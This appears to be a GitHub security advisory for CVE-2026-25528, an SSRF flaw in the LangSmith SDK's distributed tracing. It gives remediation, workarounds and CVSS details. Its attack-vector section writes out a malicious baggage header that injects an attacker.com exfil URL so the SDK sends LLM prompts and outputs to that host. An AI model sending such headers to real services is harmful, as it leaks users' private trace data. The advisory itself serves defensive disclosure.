CVE-2026-25528
ADVISORY - githubSummary
Summary
The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.
Description
When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.
Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.
Attack Vector
Attacker sends an HTTP request to a vulnerable service with a malicious
baggageheader:baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]The service parses the header via
RunTree.from_headers(), storing the attacker's URLWhen the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to
https://attacker.com/exfil
Impact
- Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
- SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services
Affected Use Cases
Applications are vulnerable if they:
- Use
TracingMiddlewareto automatically propagate tracing context - Call
RunTree.from_headers()/RunTree.fromHeaders()with untrusted HTTP headers
Remediation
Update to the patched versions:
- Python:
pip install langsmith>=0.6.3 - JavaScript:
npm install langsmith@>=0.4.6
The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.
Workarounds
If unable to upgrade immediately:
- Strip or validate the
baggageheader before passing tofrom_headers() - Do not use
TracingMiddlewarewith untrusted traffic
GitHub
3.9
CVSS SCORE
5.8medium| Package | Type | OS Name | OS Version | Affected Ranges | Fix Versions |
|---|---|---|---|---|---|
| langsmith | npm | - | - | >=0.3.41,<0.4.6 | 0.4.6 |
| langsmith | pypi | - | - | >=0.4.10,<0.6.3 | 0.6.3 |
CVSS:3 Severity and metrics
The CVSS metrics represent different qualitative aspects of a vulnerability that impact the overall score, as defined by the CVSS Specification.
The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery (IPv6) flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
The vulnerable system can be exploited without interaction from any user.
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component. In this case, the vulnerable component and the impacted component are different and managed by different security authorities.
There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is limited. The information disclosure does not cause a direct, serious loss to the impacted component.
There is no loss of trust or accuracy within the impacted component.
There is no impact to availability within the impacted component.
NIST
3.9